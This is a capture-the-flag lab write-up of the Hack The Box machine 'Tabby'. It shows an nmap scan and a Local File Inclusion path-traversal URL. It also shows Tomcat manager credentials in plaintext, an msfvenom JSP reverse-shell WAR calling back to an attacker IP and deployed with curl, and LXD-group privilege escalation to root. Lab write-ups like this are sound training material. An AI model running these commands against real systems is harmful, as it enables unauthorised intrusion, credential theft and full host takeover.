5 min to read

Tabby

Featured image

Starting with the nmap scan.

nmap -T4 -p- -A 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 00:40 IST
Nmap scan report for www.megahosting.htb (10.10.10.194)
Host is up (0.32s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   316.63 ms 10.10.14.1
2   322.75 ms www.megahosting.htb (10.10.10.194)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.51 seconds

So it had 3 ports open 22,80 and 8080.

I accessed the port 80 which gave a simple website. placeholder Most links on the website lead to nowhere except one, news. The link was trying to access megahosting.htb, so added it to my hosts file. placeholder The link was like

http://megahosting.htb/news.php?file=statement

The file parameter was vulnerable to Local File Inclusion. placeholder But it didn’t give much as I was not able to do log posioning to get shell.

Moved on to the port 8080 and found that there are two login forms. I tried to bruteforce my way in but failed.

On the homepage it was written that tomcat-users.xml file contained the username and password. I tried to access the file at /etc/tomcat9/conf/tomcat-users.xml through the LFI but it gave nothing.

I tried to know whose permission I have as LFI by reading the /proc/self/status.

http://megahosting.htb/news.php?file=/../../../../../../../../../proc/self/status

This told me that I have privilege of apache2 during LFI.

Installed tomcat9 locally through

apt-get install tomcat9

and tried to look for files that are readable by everyone by visiting the directories created after installing tomcat9. placeholder Inside /usr/share/tomcat9/etc I found tomcat-users.xml that was readable by everyone. Accessed the file on the machine through LFI and got nothing. Then i remembered that it is a XML file so it will not print anything untill it is stated in it. So opened the source of webpage and got the login information. placeholder The login details worked for host-manager and there was not much I can do with that. But I the xml file stated that tomcat user had one more role manager-script.

The manager-script role allows user to do same tasks as manager but thorugh commands not through GUI.

I created a .war payload through msfvenom and uplaoded it to get the revrese shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.32 LPORT=8888 -f war > shell.war
curl 'http://tomcat:$3cureP4s5w0rd123!@10.10.10.194:8080/manager/text/deploy?path=/shell' --upload-file shell.war

Accessed the file at

http://10.10.10.194:8080/shell

and got the reverse shell as tomcat user.

Ran the following command to make the shell tty.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Enumerating thruogh the machine I found a zipped file in /var/www/html/files/ and the file belonged to ash user on the machine. Transferred the file to local machine by first encoding it to base64 and then decoding it locally.

base64 -w 0 16162020_backup.zip
#Copied the hash and then on local terminal
echo -n base64enocdedtext | base64 -d > backup.zip

The zipped file was encrypted, so I used john to crack the password.

zip2john.py backup.py > hash
john --wordlist=rockyou.txt hash

Found the password. Unzipped the file and found that nothing interetsing inside. Used the password to switch user to ash and it worked.

Found the user.txt

Ran id and found that i ash user is member of lxd group. placeholder From Link this wonderful article got the steps needed to escalate privileges.

lxc init
#Did the same as mentioned in article

and then on local machine

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Uploaded the generated tar.gz file to the machine and then executed following commands

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

placeholder

Found all the files of the machine inside the conatainer’s /mnt/root directory as stated in the article.

Found root.txt.